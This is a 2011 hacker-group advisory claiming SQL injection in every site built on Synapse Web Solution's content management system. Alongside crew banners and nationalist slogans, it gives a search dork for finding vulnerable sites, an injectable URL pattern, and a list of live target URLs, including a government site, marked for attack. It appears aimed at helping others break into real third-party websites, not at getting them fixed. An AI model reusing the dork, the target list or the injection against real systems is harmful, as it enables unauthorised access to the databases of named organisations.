========================================================================= Synapse Web Solution SQL-i Vulnerability ========================================================================== +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= +=+=+= +=+=+= +=+=+= /\ | | | | ________ _____ _____ __ _ __ +=+=+= +=+=+= / \ | |__| | _____ / ______/ | _ \ | ____|\ \ / \ / / +=+=+= +=+=+= / /\ \| |__| | /_____/ | | | |_) / | |__ \ \/ \/ / +=+=+= +=+=+= / ____ \ | | | | |_______ | __\ \ | __| \ / +=+=+= +=+=+= /_/ \_\| | | |________/ |_| \_\ | |_______\_____/_____ +=+=+= +=+=+= |_____________________|+=+=+= +=+=+= +=+=+= +=+=+= X-n3t - **RoAd_KiLlEr** - The|Denny` - The_1nv1s1bl3 +=+=+= +=+=+= +=+=+= +=+=+= 0ne Nation , 0ne People , 0ne Culture , 0ne Language = Ethnic Albania +=+=+= +=+=+= +=+=+= +=+=+= ....::: | ALBANIAN HACKING CREW | :::.... 2011 +=+=+= +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= 0 0 1 ########################################### 1 0 I'm **RoAd_KiLlEr** member from 1337 DAY Team 1 1 ########################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+]Title :.......Synapse Web Solution SQL-i Vulnerability [+]Author :......**RoAd_KiLlEr** [+]Tested on :...Win Xp Sp 2/3 --------------------------------------------------------------------------- [~] Founded by **RoAd_KiLlEr** [~] Team: Albanian Hacking Crew [~] Contact: sukihack[at]gmail[dot]com [~] Home: http://1337day.com/author/2447 [~] Vendor: http://synapse.com.mk ==========ExPl0iT3d by **RoAd_KiLlEr**========== [+] DORK: intext:Developed by: Synapse site:.mk [+] Description: Our Content Management Systems provide a fast and effective way for information distribution. With easy to use powerful edit-tools every person in your organization with no programming skills or technical knowledge can publish, edit, archive or share text, documents, images, audio and video files. Features like adding new pages, links and menus make you totally independent with your website management thus saving you time and reducing cost. [ I ]. SQL-i Vulnerability +=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [+++] Important: Every web page developed by Synapse is vulnerable to Sql-Injection and Blind Sql. Use the Dork to find websites,than find any "php" file with "id" parameter [ .php?id= ]. Input passed via the "id" parameter in every file is not properly sanitised before being used in SQL queries. So we can use that to inject arbitrary SQL code. [P0C]: http://127.0.0.1/novosti.php?id=[SQL INJECTION] [L!v3 D3m0's]: http://synapse.com.mk/project-detail.php?id='5 <<= The Website of the Developers :] http://www.ksm.org.mk/novosti.php?id='15 http://dit.gov.mk/al/actuelnofull.php?NEWS_ID='21 <== Governament website :P http://www.jspturs.com.mk/external.php?id='44 [+] TIME TABLE: 30 April 2011 - Vulnerability discovered. 1 May 2011 - Advisory released. =========================================================================================== [!] Albanian Hacking Crew =========================================================================================== [!] **RoAd_KiLlEr** =========================================================================================== [!] MaiL: sukihack[at]gmail[dot]com =========================================================================================== [!] Greetz To : Ton![w]indowS | X-n3t | The|DennY` | THE_1NV1S1BL3 | KHG & All Albanian/Kosova Hackers =========================================================================================== [!] Spec Th4nks: r0073r | indoushka | Sid3^effects | DoNnY | All 1337day Members | And All My Friendz =========================================================================================== [!] Red n'black i dress eagle on my chest It's good to be an ALBANIAN Keep my head up high for that flag I die Im proud to be an ALBANIAN ===========================================================================================